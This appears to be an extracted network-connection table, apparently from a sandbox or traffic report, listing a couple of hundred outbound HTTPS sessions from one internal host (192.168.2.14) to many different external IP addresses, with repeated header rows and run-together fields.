                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20757192.168.2.1454346120.211.236.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20758192.168.2.1433686158.14.242.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20759192.168.2.1447026210.196.243.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20760192.168.2.14562661.196.166.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20761192.168.2.144241052.115.216.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20762192.168.2.1444204193.132.219.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20763192.168.2.146030253.162.201.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20764192.168.2.145793078.239.67.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20765192.168.2.143830491.43.17.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20766192.168.2.1438270158.135.29.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20767192.168.2.1460826171.65.94.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20768192.168.2.145681640.222.116.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20769192.168.2.1458408194.113.230.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20770192.168.2.1449718126.242.230.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20771192.168.2.1433418140.209.255.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20772192.168.2.1447862109.156.48.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20773192.168.2.143850641.39.65.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20774192.168.2.144152863.188.171.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20775192.168.2.1448226181.33.0.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20776192.168.2.144677047.208.207.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20777192.168.2.1440706178.25.89.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20778192.168.2.1436422151.234.233.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20779192.168.2.14393545.0.37.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20780192.168.2.145378690.247.139.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20781192.168.2.1448984125.111.144.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20782192.168.2.144674234.184.158.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20783192.168.2.1450710213.41.13.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20784192.168.2.14456502.126.137.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20785192.168.2.1452024166.63.246.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20786192.168.2.145093697.171.132.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20787192.168.2.1442664199.107.77.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20788192.168.2.1440356111.110.210.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20789192.168.2.1458824150.213.11.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20790192.168.2.1450590180.84.144.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20791192.168.2.1458150142.125.67.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20792192.168.2.1459258142.20.113.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20793192.168.2.145333448.108.153.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20794192.168.2.143737285.64.230.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20795192.168.2.1454356181.220.235.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20796192.168.2.1436180168.224.255.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20797192.168.2.1451084150.244.163.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20798192.168.2.144438818.195.172.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20799192.168.2.145542437.15.106.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20800192.168.2.144689673.36.134.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20801192.168.2.145635813.250.50.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20802192.168.2.1443200123.117.45.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20803192.168.2.1454374177.227.224.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20804192.168.2.144817040.215.34.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20805192.168.2.1438062102.139.180.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20806192.168.2.1446310219.87.76.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20807192.168.2.1440426115.116.139.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20808192.168.2.1459526124.141.89.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20809192.168.2.143610878.0.167.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20810192.168.2.1435254185.189.178.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20811192.168.2.145357850.192.252.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20812192.168.2.1445850187.4.116.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20813192.168.2.1456254209.90.129.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20814192.168.2.1455560210.83.240.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20815192.168.2.1454732180.197.224.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20816192.168.2.1443124176.154.254.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20817192.168.2.1440746161.158.199.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20818192.168.2.1441128211.197.158.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20819192.168.2.144166023.47.173.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20820192.168.2.144722447.216.126.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20821192.168.2.144988058.11.46.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20822192.168.2.144277637.98.74.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20823192.168.2.1434664178.225.218.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20824192.168.2.1436952115.143.238.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20825192.168.2.1443486187.164.233.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20826192.168.2.1438012201.222.95.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20827192.168.2.14572709.73.141.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20828192.168.2.143923052.218.216.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20829192.168.2.1454106138.229.107.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20830192.168.2.1445044156.195.198.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20831192.168.2.1433956149.146.35.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20832192.168.2.144143670.154.21.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20833192.168.2.14587545.143.41.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20834192.168.2.1436638164.19.89.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20835192.168.2.1460556133.193.200.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20836192.168.2.1451948208.92.132.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20837192.168.2.1444396173.115.42.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20838192.168.2.143791237.221.44.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20839192.168.2.144635092.234.225.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20840192.168.2.1444584181.176.74.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20841192.168.2.143837227.71.102.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20842192.168.2.14584069.159.58.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20843192.168.2.1452636147.129.106.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20844192.168.2.145826275.71.148.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20845192.168.2.145144057.78.130.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20846192.168.2.1448782211.47.9.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20847192.168.2.144152213.130.8.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20848192.168.2.1443448126.80.6.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20849192.168.2.144348089.200.159.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20850192.168.2.144408099.115.107.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20851192.168.2.1443916211.9.48.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20852192.168.2.1454826137.246.130.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20853192.168.2.1432992115.120.251.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20854192.168.2.1457838174.171.91.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20855192.168.2.1453172193.27.47.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20856192.168.2.145851461.59.112.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20857192.168.2.1436240169.154.228.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20858192.168.2.144286061.133.227.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20859192.168.2.144148878.32.171.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20860192.168.2.1445512162.70.74.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20861192.168.2.1450122110.246.140.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20862192.168.2.1438902196.121.174.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20863192.168.2.14417224.83.129.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20864192.168.2.145334452.234.45.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20865192.168.2.1445804175.127.207.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20866192.168.2.1447458117.125.96.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20867192.168.2.1437234108.116.158.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20868192.168.2.1444082210.55.126.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20869192.168.2.1442802210.217.1.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20870192.168.2.1457322179.178.251.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20871192.168.2.1451620119.216.22.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20872192.168.2.1458342139.209.253.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20873192.168.2.143490089.172.33.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20874192.168.2.1446778140.64.76.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20875192.168.2.1433606110.123.142.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20876192.168.2.1441952102.192.207.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20877192.168.2.14450521.248.12.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20878192.168.2.146070281.166.158.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20879192.168.2.1459866154.249.172.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20880192.168.2.145153059.21.255.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20881192.168.2.144274876.121.78.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20882192.168.2.144189676.194.204.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20883192.168.2.1436222107.12.164.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20884192.168.2.1450248221.85.35.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20885192.168.2.1451862123.76.39.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20886192.168.2.1455106172.179.6.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20887192.168.2.1440422171.78.159.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20888192.168.2.1436126114.185.54.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20889192.168.2.1447352209.242.15.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20890192.168.2.145401650.177.167.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20891192.168.2.14529885.69.159.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20892192.168.2.1457484102.47.67.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20893192.168.2.1442634176.34.124.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20894192.168.2.1456688186.249.69.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20895192.168.2.1433058203.55.28.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20896192.168.2.146088065.156.228.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20897192.168.2.144999463.222.110.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20898192.168.2.1448888109.51.227.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20899192.168.2.144606866.138.121.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20900192.168.2.14567848.85.34.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20901192.168.2.1446584207.167.113.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20902192.168.2.146013893.244.172.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20903192.168.2.144489061.200.0.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20904192.168.2.1441592171.39.212.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20905192.168.2.1436640153.18.62.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20906192.168.2.1454196196.61.238.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20907192.168.2.145529093.240.246.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20908192.168.2.1442942202.103.108.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20909192.168.2.1445542121.218.36.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20910192.168.2.1458410126.97.235.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20911192.168.2.144036888.82.80.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20912192.168.2.146086899.64.198.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20913192.168.2.1451432119.4.183.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20914192.168.2.144712267.127.48.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20915192.168.2.143789898.139.179.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20916192.168.2.1436872194.192.60.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20917192.168.2.145670887.53.95.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20918192.168.2.1433402148.70.69.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20919192.168.2.1457510158.66.21.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20920192.168.2.143899050.122.152.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20921192.168.2.144753089.245.95.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20922192.168.2.145576814.184.130.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20923192.168.2.1454782167.143.183.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20924192.168.2.145677236.88.4.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20925192.168.2.1451618220.41.139.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20926192.168.2.143778059.203.199.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20927192.168.2.1435842220.91.225.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20928192.168.2.144054497.226.160.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20929192.168.2.1435944116.247.157.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20930192.168.2.143347013.90.212.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20931192.168.2.1433826110.95.111.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20932192.168.2.145058818.160.90.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20933192.168.2.1457584119.66.252.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20934192.168.2.145497449.26.1.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20935192.168.2.145103290.146.239.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20936192.168.2.1459768136.42.125.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20937192.168.2.1449832116.229.233.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20938192.168.2.1439700184.126.180.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20939192.168.2.144512638.199.60.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20940192.168.2.144116420.251.220.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20941192.168.2.145678049.30.156.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20942192.168.2.145119459.213.250.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20943192.168.2.145659890.142.253.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20944192.168.2.1451170202.1.65.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20945192.168.2.145630451.167.91.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20946192.168.2.145958469.72.250.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20947192.168.2.1459560195.98.75.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20948192.168.2.144196449.96.42.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20949192.168.2.14401164.1.101.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20950192.168.2.1453210178.249.81.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20951192.168.2.144002671.117.179.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20952192.168.2.1443976121.134.98.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20953192.168.2.145056845.155.98.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20954192.168.2.1445566167.47.38.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20955192.168.2.1457418218.200.48.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20956192.168.2.1436928128.96.56.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20957192.168.2.1444284121.77.124.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20958192.168.2.144656850.53.217.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20959192.168.2.143337095.240.171.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20960192.168.2.144644442.157.253.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20961192.168.2.1447542220.9.243.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20962192.168.2.1454136102.15.73.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20963192.168.2.1444298102.163.76.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20964192.168.2.1458714191.216.65.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20965192.168.2.1440716212.233.61.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20966192.168.2.144758647.156.120.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20967192.168.2.1437742185.115.125.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20968192.168.2.1440924106.3.151.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20969192.168.2.1450924184.212.223.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20970192.168.2.145485281.138.143.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20971192.168.2.1458756193.177.192.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20972192.168.2.143991887.129.245.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20973192.168.2.144793083.45.37.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20974192.168.2.145140234.60.176.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20975192.168.2.144310494.120.59.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20976192.168.2.1443100111.194.6.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20977192.168.2.145585635.56.193.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20978192.168.2.143443657.84.33.105443
